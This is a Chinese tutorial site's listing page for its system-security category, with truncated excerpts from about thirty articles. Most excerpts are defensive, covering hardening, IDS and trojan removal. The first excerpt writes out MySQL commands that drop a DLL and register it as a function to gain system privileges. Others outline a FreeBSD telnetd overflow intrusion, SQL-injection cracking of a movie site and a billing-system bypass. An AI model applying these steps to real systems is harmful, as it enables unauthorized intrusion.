系统安全 - 电脑教程网
mysql获得系统权限
create table Mix(data LONGBLOB); insert Mix values();updata Mix set data = @a; select data from Mix into DUMPFILE c:\\winnt\\Mix.dll; mysql -h主机地址 -u用户名 -p用户密码 mysqluse mysql; mysql\. c:\*.dll.txt mysqlCREATE FUNCTION Mixconnect RETURNS STRING SONAME C:\\winnt\\mix.dll; mysqlSelect Minco
分类:系统安全
为Windows XP操作系统设置强健的密码
尽管绝对安全的密码是不存在的,但是相对安全的密码还是可以实现。WinXP中通过本地安全设置就可以使我们的密码更经得起考验。 一、设置可靠的密码 在“开始”→“运行”窗口中输入“secpol.msc”并回车就可以打开“本地安全设置窗口”。或者通过“控制面板”→“管理工具”→“本地安全策略”来打开这个设置界面。 在“本地
分类:系统安全
Linux 9系统下构建小型入侵检测系统
一、系统平台 Redhat9.0发行版, 安装gcc 及相关库文件,建议不要安装Apache,PHP,mysql,我们将用源码编译安装。基于安全方面的考虑,可以设置一下iptables只允许SSH和WWW访问。 二、软件 MySQL4.0.12 http://mysql.secsup.org Snort2.0.0 http://www.snort.org Apache2.0.45 http://www.apache.org PHP4.3.1 http://www.php
分类:系统安全
高端系统FreeBSD 照样给你溢出
superscan:强大的端口扫描器,快速扫描目标 服务 器端口 bsd.exe:FreeBSD Telnetd的远程溢出程序 一、搜索主机 启动superscan,在IP栏中的开始与停止处,填入起始IP和终止IP,选择搜索23端口,点击开始。去听听音乐,回来后发现扫描完成,出现很多开放23端口的机器,找到返回值是..%的IP。如图1 screen.width-300)this.wi
分类:系统安全
金梅电影系统破解笔记(破解率80%以上)
金梅电影系统破解笔记(破解率80%以上) 从我在265.com的黑客日记本中拷贝出,绝对珍藏!!!!!!!! 如果以后有机会,我会公开我的日记 金梅3几乎不存在了,如果有可以用 黄金眼(上篇14个后台那篇有上传的注册版) 不会用的 可以看 怪狗的 黄金眼动画教程 或者 臭要饭的 写的 绝世猜解SQL注入器(这可是个好东东啊)
分类:系统安全
互联--破解卡卡系统
编者:这个本来是投稿给动画栏目的, 可惜动画上发现感染了病毒不能公布,不过里面的文章经实验证明确实有效,所以发上来大家参考下吧....... 大家好~� ∥沂� 小林 今天给大家做的教程 主要讲的是如何破解卡卡系统,其实互联的卡卡系统 简直是虚设的 根本不管什么作用,我竟然在鸽子论坛看见有人在那卖破解卡卡系统的人 真
分类:系统安全
黑客经常更改的系统配置文件及注册表
目前,从计算机病毒的发展趋势来看,蠕虫/特洛伊类的病毒越来越多。与普通感染可执行文件的文件型病毒不同,此类程序通常不感染正常的系统文件,而是将自身作为系统的一部分安装到系统中。相对来说,此类病毒的隐蔽性更强一些,更不容易被使用者发觉。 但是无论什么样的病毒程序在感染系统时都会留下一些蛛丝马迹。在此我们
分类:系统安全
超级DIY WindowsXP登录界面自己做
一、在你的电脑里找到logonui.exe文件,通常位于c:\windows\system32目录中,复制两份,一份作为备份,一份用来编辑。 二、用ResHacker打开logonui.exe文件。现在我们可以开始动手制作我们自己的XP登录界面了。在ResHacker中我们可以看到有UIFILE,Bitmap,String Table,Version Info四大项。我们要修改的就是这几项。 第
分类:系统安全
消除上网的恐惧:用网上隐身衣保护自己
自从被人“黑”了几次之后,我上网的时候总感到莫名的恐惧,那些不怀好意的人似乎随时在盯着我。此时脑海里就会浮现出哈里波特的隐身斗篷--我要在网络上能隐形该多好啊! 上网需要IP,它好像这段时间里你的身份证,不过IP也会泄漏你的隐私--某些网站会偷偷记录你的IP和登录次数、各种聊天软件有了显示IP的补丁,有些甚至还
分类:系统安全
安全防御系统新趋势 IPS筛选八大定律
在保护企业网服务器不受攻击方面,安全经理面临着众多的挑战。尽管入侵检测系统(IDS)曾一度广受欢迎,但如今互联网上攻击方式不断翻新,同时,签名技术的IDS检测不到新攻击和变形攻击,也检测不出加密流量中的攻击,因此,传统的IDS在主动性上逐渐显示出其局限性。 那么,企业还有什么选择呢?入侵防护系统(IPS)是企业下一代
分类:系统安全
用IDS(入侵检测系统)保卫数据库安全
目前,针对应用及其后台数据库的应用级入侵已经变得越来越猖獗,如SQL注入、跨站点脚本攻击和未经授权的用户访问等。所有这些入侵都有可能绕过前台安全系统并对数据来源发起攻击。 为了对付这类威胁,新一级别的安全脱颖而出,这就是应用安全。这种安全技术将传统的网络和操作系统级入侵探测系统(IDS)概念应用于数据库(即应
分类:系统安全
计算机硬盘加密的几种方法
一、修改硬盘分区表信息 硬盘分区表信息对硬盘的启动至关重要,如果找不到有效的分区表,将不能从硬盘启动或即使从软盘启动也找不到硬盘。通常,第一个分区表项的第0子节为80H,表示C盘为活动DOS分区,硬盘能否自举就依*它。若将该字节改为00H,则不能从硬盘启动,但从软盘启动后,硬盘仍然可以访问。分区表的第4字节是分区
分类:系统安全
DOS下设置文件权限
前天在配置下载服务器的时候要设置文件夹权限,应为文件太大,一确定就挂了,只有在DOS下试试 C:\cacls 显示或者修改文件的访问控制表(ACL) CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]] [/P user:perm [...]] [/D user [...]] filename 显示 ACL。 /T 更改当前目录及其所有子目录中 指定文件的 ACL。 /E
分类:系统安全
检测和删除系统中的木马(Trojan Horse)教程
一、木马(Trojan Horse)介绍 木马全称为特洛伊木马(Trojan Horse,英文则简称为Trojan)。此词语来源于古希腊的神话故事,传说希腊人围攻特洛伊城,久久不能得手。后来想出了一个木马计,让士兵藏匿于巨大的木马中。大部队假装撤退而将木马摈弃于特洛伊城下,让敌人将其作为战利品拖入城内。木马内的士兵则乘夜晚敌人庆
分类:系统安全
使用漏洞扫描工具 评估网络系统安全
漏洞扫描是保证系统和网络安全必不可少的手段,本文将讲述Linux系统中,如何使用免费的远程安全扫描器Nessus进行漏洞扫描。 面对互联网入侵,如果我们能够根据具体的应用环境,尽可能早地通过网络扫描来发现安全漏洞,并及时采取适当的处理措施进行修补,就可以有效地阻止入侵事件的发生。因此,漏洞扫描非常重要和必要。漏
分类:系统安全
一次艰苦的病毒查杀过程
朋友今天中了一个病毒W32.Jeefo,病毒可以让文件空间变大,并且病毒的传染性很高,牵扯的面积也很广 有的朋友可能首先想到的是杀毒软件,比如瑞星,但是我们有一点没有考虑到,杀毒软件的功能是直接清除病毒或者 隔离,但是如果直接清除可能会损坏一些文件,而且朋友的个人服务器以及编写了1个月的程序都感染了该病毒,所以
分类:系统安全
拒绝破解 使用中文密码保护RAR文件
在RAR压缩工具中,为了保护隐私信息,我们经常会设置各式各样的密码。然而现在很多密码破解工具可以轻松破解掉你在RAR文件中设置的“英文+数字”形式的密码。这里我们教大家一招,用中文密码来保护RAR文件。 在要加密的文件上右击选择“添加到压缩文件”,在弹出的“压缩文件名和参数”窗口的“高级”选项页中点击“设置密码”
分类:系统安全
入侵检测系统(IDS)的测试与评估
随着入侵检测系统的广泛应用,对入侵检测系统进行测试和评估的要求也越来越迫切。开发者希望通过测试和评估发现产品中的不足,用户希望测试和评估来帮助自己选择合适的入侵检测产品。本文根据目前的相关研究,介绍了入侵检测系统测试评估的标准、指标,方法步骤、数据来源、环境配置、测试评估的现状以及其中存在的一些问题
分类:系统安全
另辟蹊径:Windows系统防病毒另类高招
由于网络和各种存储设备的飞速发展,使得病毒传播的几率也大大的增加了。虽然可以通过安装防病毒软件和网络防火墙来保护你的系统,但是由于病毒技术的发展势头十分迅猛,甚至许多网页中都包含了很多恶意代码,如果用户的防范意识不强的话,即使安装了防病毒软件也很容易“中招”。笔者经过查阅微软资料以及个人的使用经验,
分类:系统安全
办公室共用电脑系统安全防范攻略
目前很多单位和机房都还在使用Win2000,一来是因为机器配置低,不能安装WinXP,二来是由于单位使用的专用软件只能运行在Win2000下,要升级到WinXP没有这笔费用,所以下面我们就来谈谈Win2000网络中,如何保证共用电脑的安全,即防止别人删除你的硬盘文件,改变桌面、菜单、控制面板配置等等。如果你用的是WinXP可以参考本文
分类:系统安全
从细微处做起 全面打造系统安全
提到“系统安全”这样的字眼,相信多数人会条件反射地想到各种防火墙工具、防病毒软件等,并且会片面认为只要在系统中有了它们的存在,系统安全就会高枕无忧。其实,系统的安全单纯靠“防”是防不住的,还需要你有足够的安全意识。你对系统进行操作的一举一动都可能在系统“暗角”留下访问痕迹,这些痕迹要是不及时被清理的
分类:系统安全
让系统安全起来 把间谍软件请出硬盘
电脑病毒、木马和间谍程序并称为互联网上的三大陷阱,对付病毒和木马有专门的软件,对付更隐蔽的间谍程序我们有什么好办法吗?答案就是使用反间谍软件。目前反间谍软件非常多,比方说有Spyware Remover、SpyBot Search Destroy、Ad-Aware、PestPatrol和SpySweeper等等。这其中Spyware Remover和SpyBot Search Destroy(以下
分类:系统安全
一些Windows系统安全配置方法
逛了许多论坛,入了许多QQ群,发现很多朋友总喜欢谈论入侵呀攻击呀之类的话题。呵呵……我就想问问这些朋友--你的电脑安全吗?你安全了吗(真的值得怀疑)?   朋友!没有一个安全的环境你什么也做不了的!!     电脑安全问题一直以来都是个最重要的一个问题,也是电脑爱好者最关心的一个问题。它是个大话题涉及到电
分类:系统安全
公开密钥密码系统
公开密钥密码系统 引言 随着计算机和电子通讯技术,包括因特网的迅猛发展,金融电子化的步伐大大加快,这 种电子化、数字化的趋势已经波及社会生活的几乎所有的方面。人与人之间的许多交往活 动,包括商业贸易、金融财务和其他经济活动中,不少已以数字化信息的方式在网上流动着 。"数字化经济"(Digital Economy)的图景已经浮现,
分类:系统安全
重新启动被禁用的RPC服务 让系统更顺畅
大家还记得肆虐一时的“冲击波”病毒吧?它利用Remote Procedure Call(简称RPC)服务的DCOM漏洞攻击基于NT内核的windows 2000/XP/2003操作系统,很多用户为了躲避它的攻击,禁用了RPC服务(图1)。但当他们想再次启用RPC服务时却发现“RPC服务属性”页的“启动类型”下拉列表框和“启动”按钮变成了灰色,甚至根本找不到该服
分类:系统安全
Windows系统安全指南之域级别策略
简介 可在域级别上应用所有的帐户策略组策略设置。在帐户策略、帐户锁定策略和 Kerberos 策略内置的默认域控制器中提供了默认值。请记住,在 Microsoft Active Directory 中设置这些策略时,Microsoft Windows 仅允许一个域帐户策略:应用于域树根域的帐户策略。域帐户策略将成为属于该域的任何 Windows 系统的默认帐户策略
分类:系统安全
查找与清除插入式特络伊木马
目前网络上最猖獗的病毒估计非木马程序莫数了,2005年木马程序的攻击性也有了很大的加强,在进程隐藏方面,做了较大的改动,不再采用独立的EXE可执行文件形式,而是改为内核嵌入方式、远程线程插入技术、挂接PSAPI等,这些木马也是目前最难对付的。本期就教你查找和清除线程插入式木马。 一、通过自动运行机制查木马 一说到
分类:系统安全
小心!这些系统服务可能不老实
使用电脑经常会碰到各种各样的问题,比如:网上邻居上看不到一个邻居、无法拨号上网、电脑关机速度变慢等,在你尝试了各种方法还没有解决时,不妨到“控制面板→管理工具→服务”中查一查,没准故障的根源就在这里。 1.Computer Browser 这个服务主要用于维护网上邻居中计算机的最新列表,其中包括基于Windows的域、工作组
分类:系统安全
安全 俄罗斯系统监视器应用手册
不少读者对System Safety Monitor(以下简称为SSM)很感兴趣。它是一款俄罗斯出品的系统监控软件,通过监视系统特定的文件(如注册表等)及应用程序,达到保护系统安全的目的。在某些功能上比我们之前介绍过的Winpatrol更强大。 安装并启动(可能需手动到安装目录中运行SysSafe.exe)SSM后,点击弹出的LOGO窗口中的Close this win
分类:系统安全
隐藏卸载信息 跟入侵者玩
在控制面板中的“添加/删除程序”项是我们要卸载程序一个程序最彻底的地方。但很多时候为了防止自己安装的程序不被别人卸载,我们希望能够在“添加/删除程序”中不显示已安装的某些程序,或者隐藏“添加/删除程序”中的某些选项使卸载无从入手。 隐藏“添加/删除程序”中的程序 单击打开“开始”菜单中的运行”对话框,在其
分类:系统安全
<< 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 >>